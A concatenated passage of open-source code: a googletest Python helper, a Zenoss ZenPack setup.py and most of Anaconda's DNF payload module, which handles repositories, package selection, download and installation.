"""Returns the absolute path of the test binary given its name.
The function will print a message and abort the program if the resulting file
doesn't exist.
Args:
executable_name: name of the test binary that the test script runs.
build_dir: directory where to look for executables, by default
the result of GetBuildDir().
Returns:
The absolute path of the test binary.
"""
path = os.path.abspath(os.path.join(build_dir or GetBuildDir(),
executable_name))
if (IS_WINDOWS or IS_CYGWIN) and not path.endswith('.exe'):
path += '.exe'
if not os.path.exists(path):
message = (
'Unable to find the test binary. Please make sure to provide path\n'
'to the binary via the --build_dir flag or the BUILD_DIR\n'
'environment variable.')
print >> sys.stderr, message
sys.exit(1)
return path
def GetExitStatus(exit_code):
"""Returns the argument to exit(), or -1 if exit() wasn't called.
Args:
exit_code: the result value of os.system(command).
"""
if os.name == 'nt':
# On Windows, os.WEXITSTATUS() doesn't work and os.system() returns
# the argument to exit() directly.
return exit_code
else:
# On Unix, os.WEXITSTATUS() must be used to extract the exit status
# from the result of os.system().
if os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
return -1
class Subprocess:
def __init__(self, command, working_dir=None, capture_stderr=True, env=None):
"""Changes into a specified directory, if provided, and executes a command.
Restores the old directory afterwards.
Args:
command: The command to run, in the form of sys.argv.
working_dir: The directory to change into.
capture_stderr: Determines whether to capture stderr in the output member
or to discard it.
env: Dictionary with environment to pass to the subprocess.
Returns:
An object that represents outcome of the executed process. It has the
following attributes:
terminated_by_signal True iff the child process has been terminated
by a signal.
signal Sygnal that terminated the child process.
exited True iff the child process exited normally.
exit_code The code with which the child process exited.
output Child process's stdout and stderr output
combined in a string.
"""
# The subprocess module is the preferrable way of running programs
# since it is available and behaves consistently on all platforms,
# including Windows. But it is only available starting in python 2.4.
# In earlier python versions, we revert to the popen2 module, which is
# available in python 2.0 and later but doesn't provide required
# functionality (Popen4) under Windows. This allows us to support Mac
# OS X 10.4 Tiger, which has python 2.3 installed.
if _SUBPROCESS_MODULE_AVAILABLE:
if capture_stderr:
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=stderr,
cwd=working_dir, universal_newlines=True, env=env)
# communicate returns a tuple with the file obect for the child's
# output.
self.output = p.communicate()[0]
self._return_code = p.returncode
else:
old_dir = os.getcwd()
def _ReplaceEnvDict(dest, src):
# Changes made by os.environ.clear are not inheritable by child
# processes until Python 2.6. To produce inheritable changes we have
# to delete environment items with the del statement.
for key in dest.keys():
del dest[key]
dest.update(src)
# When 'env' is not None, backup the environment variables and replace
# them with the passed 'env'. When 'env' is None, we simply use the
# current 'os.environ' for compatibility with the subprocess.Popen
# semantics used above.
if env is not None:
old_environ = os.environ.copy()
_ReplaceEnvDict(os.environ, env)
try:
if working_dir is not None:
os.chdir(working_dir)
if capture_stderr:
p = popen2.Popen4(command)
else:
p = popen2.Popen3(command)
p.tochild.close()
self.output = p.fromchild.read()
ret_code = p.wait()
finally:
os.chdir(old_dir)
# Restore the old environment variables
# if they were replaced.
if env is not None:
_ReplaceEnvDict(os.environ, old_environ)
# Converts ret_code to match the semantics of
# subprocess.Popen.returncode.
if os.WIFSIGNALED(ret_code):
self._return_code = -os.WTERMSIG(ret_code)
else: # os.WIFEXITED(ret_code) should return True here.
self._return_code = os.WEXITSTATUS(ret_code)
if self._return_code < 0:
self.terminated_by_signal = True
self.exited = False
self.signal = -self._return_code
else:
self.terminated_by_signal = False
self.exited = True
self.exit_code = self._return_code
def Main():
"""Runs the unit test."""
# We must call _ParseAndStripGTestFlags() before calling
# unittest.main(). Otherwise the latter will be confused by the
# --gtest_* flags.
_ParseAndStripGTestFlags(sys.argv)
# The tested binaries should not be writing XML output files unless the
# script explicitly instructs them to.
# TODO(vladl@google.com): Move this into Subprocess when we implement
# passing environment into it as a parameter.
if GTEST_OUTPUT_VAR_NAME in os.environ:
del os.environ[GTEST_OUTPUT_VAR_NAME]
_test_module.main()
| bsd-3-clause |
anksp21/Community-Zenpacks | ZenPacks.AndreaConsadori.MSIAS_RadiusServer/setup.py | 2 | 2644 | ################################
# These variables are overwritten by Zenoss when the ZenPack is exported
# or saved. Do not modify them directly here.
# NB: PACKAGES is deprecated
NAME = 'ZenPacks.AndreaConsadori.MSIAS_RadiusServer'
VERSION = '3.0'
AUTHOR = 'Andrea Consadori'
LICENSE = 'GPLv2'
NAMESPACE_PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori']
PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori', 'ZenPacks.AndreaConsadori.MSIAS_RadiusServer']
INSTALL_REQUIRES = []
COMPAT_ZENOSS_VERS = '>=3.0'
PREV_ZENPACK_NAME = ''
# STOP_REPLACEMENTS
################################
# Zenoss will not overwrite any changes you make below here.
from setuptools import setup, find_packages
setup(
# This ZenPack metadata should usually be edited with the Zenoss
# ZenPack edit page. Whenever the edit page is submitted it will
# overwrite the values below (the ones it knows about) with new values.
name = NAME,
version = VERSION,
author = AUTHOR,
license = LICENSE,
# This is the version spec which indicates what versions of Zenoss
# this ZenPack is compatible with
compatZenossVers = COMPAT_ZENOSS_VERS,
# previousZenPackName is a facility for telling Zenoss that the name
# of this ZenPack has changed. If no ZenPack with the current name is
# installed then a zenpack of this name if installed will be upgraded.
prevZenPackName = PREV_ZENPACK_NAME,
# Indicate to setuptools which namespace packages the zenpack
# participates in
namespace_packages = NAMESPACE_PACKAGES,
# Tell setuptools what packages this zenpack provides.
packages = find_packages(),
# Tell setuptools to figure out for itself which files to include
# in the binary egg when it is built.
include_package_data = True,
# The MANIFEST.in file is the recommended way of including additional files
# in your ZenPack. package_data is another.
#package_data = {}
# Indicate dependencies on other python modules or ZenPacks. This line
# is modified by zenoss when the ZenPack edit page is submitted. Zenoss
# tries to put add/delete the names it manages at the beginning of this
# list, so any manual additions should be added to the end. Things will
# go poorly if this line is broken into multiple lines or modified to
# dramatically.
install_requires = INSTALL_REQUIRES,
# Every ZenPack egg must define exactly one zenoss.zenpacks entry point
# of this form.
entry_points = {
'zenoss.zenpacks': '%s = %s' % (NAME, NAME),
},
# All ZenPack eggs must be installed in unzipped form.
zip_safe = False,
)
| gpl-2.0 |
karmix/anaconda | pyanaconda/packaging/dnfpayload.py | 2 | 35909 | # dnfpayload.py
# DNF/rpm software payload management.
#
# Copyright (C) 2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Ales Kozumplik <akozumpl@redhat.com>
#
import os
from blivet.size import Size
import blivet.arch
from pyanaconda.flags import flags
from pyanaconda.i18n import _, N_
from pyanaconda.progress import progressQ, progress_message
from pyanaconda.simpleconfig import simple_replace
import configparser
import collections
import itertools
import logging
import multiprocessing
import operator
from pyanaconda import constants
from pykickstart.constants import GROUP_ALL, GROUP_DEFAULT, KS_MISSING_IGNORE
import pyanaconda.errors as errors
import pyanaconda.iutil
import pyanaconda.localization
import pyanaconda.packaging as packaging
import shutil
import sys
import time
import threading
from pyanaconda.iutil import ProxyString, ProxyStringError
from pyanaconda.iutil import open # pylint: disable=redefined-builtin
log = logging.getLogger("packaging")
import dnf
import dnf.exceptions
import dnf.repo
import dnf.callback
import rpm
DNF_CACHE_DIR = '/tmp/dnf.cache'
DNF_PLUGINCONF_DIR = '/tmp/dnf.pluginconf'
DNF_PACKAGE_CACHE_DIR_SUFFIX = 'dnf.package.cache'
DOWNLOAD_MPOINTS = {'/tmp',
'/',
'/mnt/sysimage',
'/mnt/sysimage/home',
'/mnt/sysimage/tmp',
'/mnt/sysimage/var',
}
REPO_DIRS = ['/etc/yum.repos.d',
'/etc/anaconda.repos.d',
'/tmp/updates/anaconda.repos.d',
'/tmp/product/anaconda.repos.d']
YUM_REPOS_DIR = "/etc/yum.repos.d/"
_DNF_INSTALLER_LANGPACK_CONF = DNF_PLUGINCONF_DIR + "/langpacks.conf"
_DNF_TARGET_LANGPACK_CONF = "/etc/dnf/plugins/langpacks.conf"
def _failure_limbo():
progressQ.send_quit(1)
while True:
time.sleep(10000)
def _df_map():
"""Return (mountpoint -> size available) mapping."""
output = pyanaconda.iutil.execWithCapture('df', ['--output=target,avail'])
output = output.rstrip()
lines = output.splitlines()
structured = {}
for line in lines:
items = line.split()
key = items[0]
val = items[1]
if not key.startswith('/'):
continue
structured[key] = Size(int(val)*1024)
return structured
def _paced(fn):
"""Execute `fn` no more often then every 2 seconds."""
def paced_fn(self, *args):
now = time.time()
if now - self.last_time < 2:
return
self.last_time = now
return fn(self, *args)
return paced_fn
def _pick_mpoint(df, download_size, install_size):
def reasonable_mpoint(mpoint):
return mpoint in DOWNLOAD_MPOINTS
requested = download_size
requested_root = requested + install_size
root_mpoint = pyanaconda.iutil.getSysroot()
sufficients = {key : val for (key, val) in df.items()
# for root we need to take in count both download and install size
if ((key != root_mpoint and val > requested)
or val > requested_root) and reasonable_mpoint(key)}
log.debug('Estimated size: download %s & install %s - df: %s', requested,
(requested_root - requested), df)
log.info('Sufficient mountpoints found: %s', sufficients)
if not len(sufficients):
return None
# default to the biggest one:
return sorted(sufficients.items(), key=operator.itemgetter(1),
reverse=True)[0][0]
class PayloadRPMDisplay(dnf.callback.LoggingTransactionDisplay):
def __init__(self, queue_instance):
super(PayloadRPMDisplay, self).__init__()
self._queue = queue_instance
self._last_ts = None
self.cnt = 0
def event(self, package, action, te_current, te_total, ts_current, ts_total):
if action == self.PKG_INSTALL and te_current == 0:
# do not report same package twice
if self._last_ts == ts_current:
return
self._last_ts = ts_current
msg = '%s.%s (%d/%d)' % \
(package.name, package.arch, ts_current, ts_total)
self.cnt += 1
self._queue.put(('install', msg))
elif action == self.TRANS_POST:
self._queue.put(('post', None))
class DownloadProgress(dnf.callback.DownloadProgress):
def __init__(self):
self.downloads = collections.defaultdict(int)
self.last_time = time.time()
self.total_files = 0
self.total_size = Size(0)
@_paced
def _update(self):
msg = _('Downloading %(total_files)s RPMs, '
'%(downloaded)s / %(total_size)s (%(percent)d%%) done.')
downloaded = Size(sum(self.downloads.values()))
vals = {
'downloaded' : downloaded,
'percent' : int(100 * downloaded/self.total_size),
'total_files' : self.total_files,
'total_size' : self.total_size
}
progressQ.send_message(msg % vals)
def end(self, payload, status, err_msg):
nevra = str(payload)
if status is dnf.callback.STATUS_OK:
self.downloads[nevra] = payload.download_size
self._update()
return
log.warning("Failed to download '%s': %d - %s", nevra, status, err_msg)
def progress(self, payload, done):
nevra = str(payload)
self.downloads[nevra] = done
self._update()
def start(self, total_files, total_size):
self.total_files = total_files
self.total_size = Size(total_size)
def do_transaction(base, queue_instance):
try:
display = PayloadRPMDisplay(queue_instance)
base.do_transaction(display=display)
except BaseException as e:
log.error('The transaction process has ended abruptly')
log.info(e)
queue_instance.put(('quit', str(e)))
class DNFPayload(packaging.PackagePayload):
def __init__(self, data):
packaging.PackagePayload.__init__(self, data)
self._base = None
self._download_location = None
self._configure()
# Protect access to _base.repos to ensure that the dictionary is not
# modified while another thread is attempting to iterate over it. The
# lock only needs to be held during operations that change the number
# of repos or that iterate over the repos.
self._repos_lock = threading.RLock()
def unsetup(self):
super(DNFPayload, self).unsetup()
self._base = None
self._configure()
def _replace_vars(self, url):
""" Replace url variables with their values
:param url: url string to do replacement on
:type url: string
:returns: string with variables substituted
:rtype: string or None
Currently supports $releasever and $basearch
"""
if not url:
return url
url = url.replace("$releasever", self._base.conf.releasever)
url = url.replace("$basearch", blivet.arch.getArch())
return url
def _add_repo(self, ksrepo):
"""Add a repo to the dnf repo object
:param ksrepo: Kickstart Repository to add
:type ksrepo: Kickstart RepoData object.
:returns: None
"""
repo = dnf.repo.Repo(ksrepo.name, DNF_CACHE_DIR)
url = self._replace_vars(ksrepo.baseurl)
mirrorlist = self._replace_vars(ksrepo.mirrorlist)
if url and url.startswith("nfs://"):
(server, path) = url[6:].split(":", 1)
mountpoint = "%s/%s.nfs" % (constants.MOUNT_DIR, repo.name)
self._setupNFS(mountpoint, server, path, None)
url = "file://" + mountpoint
if url:
repo.baseurl = [url]
if mirrorlist:
repo.mirrorlist = mirrorlist
repo.sslverify = not (ksrepo.noverifyssl or flags.noverifyssl)
if ksrepo.proxy:
try:
repo.proxy = ProxyString(ksrepo.proxy).url
except ProxyStringError as e:
log.error("Failed to parse proxy for _add_repo %s: %s",
ksrepo.proxy, e)
if ksrepo.cost:
repo.cost = ksrepo.cost
if ksrepo.includepkgs:
repo.include = ksrepo.includepkgs
if ksrepo.excludepkgs:
repo.exclude = ksrepo.excludepkgs
# If this repo is already known, it's one of two things:
# (1) The user is trying to do "repo --name=updates" in a kickstart file
# and we should just know to enable the already existing on-disk
# repo config.
# (2) It's a duplicate, and we need to delete the existing definition
# and use this new one. The highest profile user of this is livecd
# kickstarts.
if repo.id in self._base.repos:
if not url and not mirrorlist:
self._base.repos[repo.id].enable()
else:
with self._repos_lock:
self._base.repos.pop(repo.id)
self._base.repos.add(repo)
repo.enable()
# If the repo's not already known, we've got to add it.
else:
with self._repos_lock:
self._base.repos.add(repo)
repo.enable()
# Load the metadata to verify that the repo is valid
try:
self._base.repos[repo.id].load()
except dnf.exceptions.RepoError as e:
raise packaging.MetadataError(e)
log.info("added repo: '%s' - %s", ksrepo.name, url or mirrorlist)
def addRepo(self, ksrepo):
"""Add a repo to dnf and kickstart repo lists
:param ksrepo: Kickstart Repository to add
:type ksrepo: Kickstart RepoData object.
:returns: None
"""
self._add_repo(ksrepo)
super(DNFPayload, self).addRepo(ksrepo)
def _apply_selections(self):
if self.data.packages.nocore:
log.info("skipping core group due to %%packages --nocore; system may not be complete")
else:
try:
self._select_group('core', required=True)
log.info("selected group: core")
except packaging.NoSuchGroup as e:
self._miss(e)
env = None
if self.data.packages.default and self.environments:
env = self.environments[0]
elif self.data.packages.environment:
env = self.data.packages.environment
excludedGroups = [group.name for group in self.data.packages.excludedGroupList]
if env:
try:
self._select_environment(env, excludedGroups)
log.info("selected env: %s", env)
except packaging.NoSuchGroup as e:
self._miss(e)
for group in self.data.packages.groupList:
if group.name == 'core' or group.name in excludedGroups:
continue
default = group.include in (GROUP_ALL,
GROUP_DEFAULT)
optional = group.include == GROUP_ALL
try:
self._select_group(group.name, default=default, optional=optional)
log.info("selected group: %s", group.name)
except packaging.NoSuchGroup as e:
self._miss(e)
for pkg_name in set(self.data.packages.packageList) - set(self.data.packages.excludedList):
try:
self._install_package(pkg_name)
log.info("selected package: '%s'", pkg_name)
except packaging.NoSuchPackage as e:
self._miss(e)
self._select_kernel_package()
for pkg_name in self.requiredPackages:
try:
self._install_package(pkg_name, required=True)
log.debug("selected required package: %s", pkg_name)
except packaging.NoSuchPackage as e:
self._miss(e)
for group in self.requiredGroups:
try:
self._select_group(group, required=True)
log.debug("selected required group: %s", group)
except packaging.NoSuchGroup as e:
self._miss(e)
def _bump_tx_id(self):
if self.txID is None:
self.txID = 1
else:
self.txID += 1
return self.txID
def _configure(self):
self._base = dnf.Base()
conf = self._base.conf
conf.cachedir = DNF_CACHE_DIR
conf.pluginconfpath = DNF_PLUGINCONF_DIR
conf.logdir = '/tmp/'
# disable console output completely:
conf.debuglevel = 0
conf.errorlevel = 0
self._base.logging.setup_from_dnf_conf(conf)
conf.releasever = self._getReleaseVersion(None)
conf.installroot = pyanaconda.iutil.getSysroot()
conf.prepend_installroot('persistdir')
# NSS won't survive the forking we do to shield out chroot during
# transaction, disable it in RPM:
conf.tsflags.append('nocrypto')
if self.data.packages.multiLib:
conf.multilib_policy = "all"
if hasattr(self.data.method, "proxy") and self.data.method.proxy:
try:
proxy = ProxyString(self.data.method.proxy)
conf.proxy = proxy.noauth_url
if proxy.username:
conf.proxy_username = proxy.username
if proxy.password:
conf.proxy_password = proxy.password
log.info("Using %s as proxy", self.data.method.proxy)
except ProxyStringError as e:
log.error("Failed to parse proxy for dnf configure %s: %s",
self.data.method.proxy, e)
# Start with an empty comps so we can go ahead and use the environment
# and group properties. Unset reposdir to ensure dnf has nothing it can
# check automatically
conf.reposdir = []
self._base.read_comps()
conf.reposdir = REPO_DIRS
@property
def _download_space(self):
transaction = self._base.transaction
if transaction is None:
return Size(0)
size = sum(tsi.installed.downloadsize for tsi in transaction)
# reserve extra
return Size(size) + Size("150 MB")
def _install_package(self, pkg_name, required=False):
try:
return self._base.install(pkg_name)
except dnf.exceptions.MarkingError:
raise packaging.NoSuchPackage(pkg_name, required=required)
def _miss(self, exn):
if self.data.packages.handleMissing == KS_MISSING_IGNORE:
return
log.error('Missed: %r', exn)
if errors.errorHandler.cb(exn) == errors.ERROR_RAISE:
# The progress bar polls kind of slowly, thus installation could
# still continue for a bit before the quit message is processed.
# Doing a sys.exit also ensures the running thread quits before
# it can do anything else.
progressQ.send_quit(1)
pyanaconda.iutil.ipmi_report(constants.IPMI_ABORTED)
sys.exit(1)
def _pick_download_location(self):
download_size = self._download_space
install_size = self._spaceRequired()
df_map = _df_map()
mpoint = _pick_mpoint(df_map, download_size, install_size)
if mpoint is None:
msg = "Not enough disk space to download the packages."
raise packaging.PayloadError(msg)
pkgdir = '%s/%s' % (mpoint, DNF_PACKAGE_CACHE_DIR_SUFFIX)
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
repo.pkgdir = pkgdir
return pkgdir
def _select_group(self, group_id, default=True, optional=False, required=False):
grp = self._base.comps.group_by_pattern(group_id)
if grp is None:
raise packaging.NoSuchGroup(group_id, required=required)
types = {'mandatory'}
if default:
types.add('default')
if optional:
types.add('optional')
exclude = self.data.packages.excludedList
try:
self._base.group_install(grp, types, exclude=exclude)
except dnf.exceptions.CompsError as e:
# DNF raises this when it is already selected
log.debug(e)
def _select_environment(self, env_id, excluded):
# dnf.base.environment_install excludes on packages instead of groups,
# which is unhelpful. Instead, use group_install for each group in
# the environment so we can skip the ones that are excluded.
for groupid in set(self.environmentGroups(env_id, optional=False)) - set(excluded):
self._select_group(groupid)
def _select_kernel_package(self):
kernels = self.kernelPackages
for kernel in kernels:
try:
self._install_package(kernel)
except packaging.NoSuchPackage:
log.info('kernel: no such package %s', kernel)
else:
log.info('kernel: selected %s', kernel)
break
else:
log.error('kernel: failed to select a kernel from %s', kernels)
def _sync_metadata(self, dnf_repo):
try:
dnf_repo.load()
except dnf.exceptions.RepoError as e:
id_ = dnf_repo.id
log.info('_sync_metadata: addon repo error: %s', e)
self.disableRepo(id_)
self.verbose_errors.append(str(e))
@property
def baseRepo(self):
# is any locking needed here?
repo_names = [constants.BASE_REPO_NAME] + self.DEFAULT_REPOS
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
if repo.id in repo_names:
return repo.id
return None
@property
def environments(self):
return [env.id for env in self._base.comps.environments]
@property
def groups(self):
groups = self._base.comps.groups_iter()
return [g.id for g in groups]
@property
def mirrorEnabled(self):
return True
@property
def repos(self):
# known repo ids
with self._repos_lock:
return [r.id for r in self._base.repos.values()]
@property
def spaceRequired(self):
size = self._spaceRequired()
download_size = self._download_space
valid_points = _df_map()
root_mpoint = pyanaconda.iutil.getSysroot()
for (key, val) in self.storage.mountpoints.items():
new_key = key
if key.endswith('/'):
new_key = key[:-1]
# we can ignore swap
if key.startswith('/') and ((root_mpoint + new_key) not in valid_points):
valid_points[root_mpoint + new_key] = val.format.freeSpaceEstimate(val.size)
m_points = _pick_mpoint(valid_points, download_size, size)
if not m_points or m_points == root_mpoint:
# download and install to the same mount point
size = size + download_size
log.debug("Instalation space required %s for mpoints %s", size, m_points)
return size
def _spaceRequired(self):
transaction = self._base.transaction
if transaction is None:
return Size("3000 MB")
size = sum(tsi.installed.installsize for tsi in transaction)
# add 35% to account for the fact that the above method is laughably
# inaccurate:
size *= 1.35
return Size(size)
def _isGroupVisible(self, grpid):
grp = self._base.comps.group_by_pattern(grpid)
if grp is None:
raise packaging.NoSuchGroup(grpid)
return grp.visible
def _groupHasInstallableMembers(self, grpid):
return True
def checkSoftwareSelection(self):
log.info("checking software selection")
self._bump_tx_id()
self._base.reset(goal=True)
self._apply_selections()
try:
if self._base.resolve():
log.debug("checking dependencies: success.")
else:
log.debug("empty transaction")
except dnf.exceptions.DepsolveError as e:
msg = str(e)
log.warning(msg)
raise packaging.DependencyError(msg)
log.info("%d packages selected totalling %s",
len(self._base.transaction), self.spaceRequired)
def disableRepo(self, repo_id):
try:
self._base.repos[repo_id].disable()
log.info("Disabled '%s'", repo_id)
except KeyError:
pass
super(DNFPayload, self).disableRepo(repo_id)
def enableRepo(self, repo_id):
try:
self._base.repos[repo_id].enable()
log.info("Enabled '%s'", repo_id)
except KeyError:
pass
super(DNFPayload, self).enableRepo(repo_id)
def environmentDescription(self, environmentid):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
return (env.ui_name, env.ui_description)
def environmentId(self, environment):
""" Return environment id for the environment specified by id or name."""
env = self._base.comps.environment_by_pattern(environment)
if env is None:
raise packaging.NoSuchGroup(environment)
return env.id
def environmentGroups(self, environmentid, optional=True):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
group_ids = (id_.name for id_ in env.group_ids)
option_ids = (id_.name for id_ in env.option_ids)
if optional:
return list(itertools.chain(group_ids, option_ids))
else:
return list(group_ids)
def environmentHasOption(self, environmentid, grpid):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
return grpid in (id_.name for id_ in env.option_ids)
def environmentOptionIsDefault(self, environmentid, grpid):
env = self._base.comps.environment_by_pattern(environmentid)
if env is None:
raise packaging.NoSuchGroup(environmentid)
# Look for a group in the optionlist that matches the group_id and has
# default set
return any(grp for grp in env.option_ids if grp.name == grpid and grp.default)
def groupDescription(self, grpid):
""" Return name/description tuple for the group specified by id. """
grp = self._base.comps.group_by_pattern(grpid)
if grp is None:
raise packaging.NoSuchGroup(grpid)
return (grp.ui_name, grp.ui_description)
def gatherRepoMetadata(self):
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
self._sync_metadata(repo)
self._base.fill_sack(load_system_repo=False)
self._base.read_comps()
self._refreshEnvironmentAddons()
def install(self):
progress_message(N_('Starting package installation process'))
# Add the rpm macros to the global transaction environment
for macro in self.rpmMacros:
rpm.addMacro(macro[0], macro[1])
if self.install_device:
self._setupMedia(self.install_device)
try:
self.checkSoftwareSelection()
self._download_location = self._pick_download_location()
except packaging.PayloadError as e:
if errors.errorHandler.cb(e) == errors.ERROR_RAISE:
_failure_limbo()
pkgs_to_download = self._base.transaction.install_set
log.info('Downloading packages.')
progressQ.send_message(_('Downloading packages'))
progress = DownloadProgress()
try:
self._base.download_packages(pkgs_to_download, progress)
except dnf.exceptions.DownloadError as e:
msg = 'Failed to download the following packages: %s' % str(e)
exc = packaging.PayloadInstallError(msg)
if errors.errorHandler.cb(exc) == errors.ERROR_RAISE:
_failure_limbo()
log.info('Downloading packages finished.')
pre_msg = (N_("Preparing transaction from installation source"))
progress_message(pre_msg)
queue_instance = multiprocessing.Queue()
process = multiprocessing.Process(target=do_transaction,
args=(self._base, queue_instance))
process.start()
(token, msg) = queue_instance.get()
while token not in ('post', 'quit'):
if token == 'install':
msg = _("Installing %s") % msg
progressQ.send_message(msg)
(token, msg) = queue_instance.get()
if token == 'quit':
_failure_limbo()
post_msg = (N_("Performing post-installation setup tasks"))
progress_message(post_msg)
process.join()
self._base.close()
if os.path.exists(self._download_location):
log.info("Cleaning up downloaded packages: %s", self._download_location)
shutil.rmtree(self._download_location)
else:
# Some installation sources, such as NFS, don't need to download packages to
# local storage, so the download location might not always exist. So for now
# warn about this, at least until the RFE in bug 1193121 is implemented and
# we don't have to care about clearing the download location ourselves.
log.warning("Can't delete nonexistent download location: %s", self._download_location)
def getRepo(self, repo_id):
""" Return the yum repo object. """
return self._base.repos[repo_id]
def isRepoEnabled(self, repo_id):
try:
return self._base.repos[repo_id].enabled
except (dnf.exceptions.RepoError, KeyError):
return super(DNFPayload, self).isRepoEnabled(repo_id)
def languageGroups(self):
locales = [self.data.lang.lang] + self.data.lang.addsupport
match_fn = pyanaconda.localization.langcode_matches_locale
gids = set()
gl_tuples = ((g.id, g.lang_only) for g in self._base.comps.groups_iter())
for (gid, lang) in gl_tuples:
for locale in locales:
if match_fn(lang, locale):
gids.add(gid)
log.info('languageGroups: %s', gids)
return list(gids)
def preInstall(self, packages=None, groups=None):
super(DNFPayload, self).preInstall(packages, groups)
self.requiredPackages += ["dnf"]
if packages:
self.requiredPackages += packages
self.requiredGroups = groups
# Write the langpacks config
pyanaconda.iutil.mkdirChain(DNF_PLUGINCONF_DIR)
langs = [self.data.lang.lang] + self.data.lang.addsupport
# Start with the file in /etc, if one exists. Otherwise make an empty config
if os.path.exists(_DNF_TARGET_LANGPACK_CONF):
shutil.copy2(_DNF_TARGET_LANGPACK_CONF, _DNF_INSTALLER_LANGPACK_CONF)
else:
with open(_DNF_INSTALLER_LANGPACK_CONF, "w") as f:
f.write("[main]\n")
# langpacks.conf is an INI style config file, read it and
# add or change the enabled and langpack_locales entries without
# changing anything else.
keys=[("langpack_locales", "langpack_locales=" + ", ".join(langs)),
("enabled", "enabled=1")]
simple_replace(_DNF_INSTALLER_LANGPACK_CONF, keys)
def reset(self):
super(DNFPayload, self).reset()
shutil.rmtree(DNF_CACHE_DIR, ignore_errors=True)
shutil.rmtree(DNF_PLUGINCONF_DIR, ignore_errors=True)
self.txID = None
self._base.reset(sack=True, repos=True)
def updateBaseRepo(self, fallback=True, checkmount=True):
log.info('configuring base repo')
self.reset()
url, mirrorlist, sslverify = self._setupInstallDevice(self.storage,
checkmount)
method = self.data.method
# Read in all the repos from the installation environment, make a note of which
# are enabled, and then disable them all. If the user gave us a method, we want
# to use that instead of the default repos.
self._base.read_all_repos()
enabled = []
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
enabled.append(repo.id)
repo.disable()
# If askmethod was specified on the command-line, leave all the repos
# disabled and return
if flags.askmethod:
return
if method.method:
try:
self._base.conf.releasever = self._getReleaseVersion(url)
log.debug("releasever from %s is %s", url, self._base.conf.releasever)
except configparser.MissingSectionHeaderError as e:
log.error("couldn't set releasever from base repo (%s): %s",
method.method, e)
try:
proxy = getattr(method, "proxy", None)
base_ksrepo = self.data.RepoData(
name=constants.BASE_REPO_NAME, baseurl=url,
mirrorlist=mirrorlist, noverifyssl=not sslverify, proxy=proxy)
self._add_repo(base_ksrepo)
except (packaging.MetadataError, packaging.PayloadError) as e:
log.error("base repo (%s/%s) not valid -- removing it",
method.method, url)
with self._repos_lock:
self._base.repos.pop(constants.BASE_REPO_NAME, None)
if not fallback:
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
self.disableRepo(repo.id)
return
# this preserves the method details while disabling it
method.method = None
self.install_device = None
# We need to check this again separately in case method.method was unset above.
if not method.method:
# If this is a kickstart install, just return now
if flags.automatedInstall:
return
# Otherwise, fall back to the default repos that we disabled above
with self._repos_lock:
for (id_, repo) in self._base.repos.items():
if id_ in enabled:
repo.enable()
for ksrepo in self.data.repo.dataList():
log.debug("repo %s: mirrorlist %s, baseurl %s",
ksrepo.name, ksrepo.mirrorlist, ksrepo.baseurl)
# one of these must be set to create new repo
if not (ksrepo.mirrorlist or ksrepo.baseurl):
raise packaging.PayloadSetupError("Repository %s has no mirror or baseurl set"
% ksrepo.name)
self._add_repo(ksrepo)
ksnames = [r.name for r in self.data.repo.dataList()]
ksnames.append(constants.BASE_REPO_NAME)
with self._repos_lock:
for repo in self._base.repos.iter_enabled():
id_ = repo.id
if 'source' in id_ or 'debuginfo' in id_:
self.disableRepo(id_)
elif constants.isFinal and 'rawhide' in id_:
self.disableRepo(id_)
def _writeDNFRepo(self, repo, repo_path):
""" Write a repo object to a DNF repo.conf file
:param repo: DNF repository object
:param string repo_path: Path to write the repo to
:raises: PayloadSetupError if the repo doesn't have a url
"""
with open(repo_path, "w") as f:
f.write("[%s]\n" % repo.id)
f.write("name=%s\n" % repo.id)
if self.isRepoEnabled(repo.id):
f.write("enabled=1\n")
else:
f.write("enabled=0\n")
if repo.mirrorlist:
f.write("mirrorlist=%s\n" % repo.mirrorlist)
elif repo.metalink:
f.write("metalink=%s\n" % repo.metalink)
elif repo.baseurl:
f.write("baseurl=%s\n" % repo.baseurl[0])
else:
f.close()
os.unlink(repo_path)
raise packaging.PayloadSetupError("repo %s has no baseurl, mirrorlist or metalink", repo.id)
# kickstart repo modifiers
ks_repo = self.getAddOnRepo(repo.id)
if not ks_repo:
return
if ks_repo.noverifyssl:
f.write("sslverify=0\n")
if ks_repo.proxy:
try:
proxy = ProxyString(ks_repo.proxy)
f.write("proxy=%s\n" % proxy.url)
except ProxyStringError as e:
log.error("Failed to parse proxy for _writeInstallConfig %s: %s",
ks_repo.proxy, e)
if ks_repo.cost:
f.write("cost=%d\n" % ks_repo.cost)
if ks_repo.includepkgs:
f.write("include=%s\n" % ",".join(ks_repo.includepkgs))
if ks_repo.excludepkgs:
f.write("exclude=%s\n" % ",".join(ks_repo.excludepkgs))
def postInstall(self):
""" Perform post-installation tasks. """
# Write selected kickstart repos to target system
for ks_repo in (ks for ks in (self.getAddOnRepo(r) for r in self.addOns) if ks.install):
if ks_repo.baseurl.startswith("nfs://"):
log.info("Skip writing nfs repo %s to target system.", ks_repo.name)
continue
try:
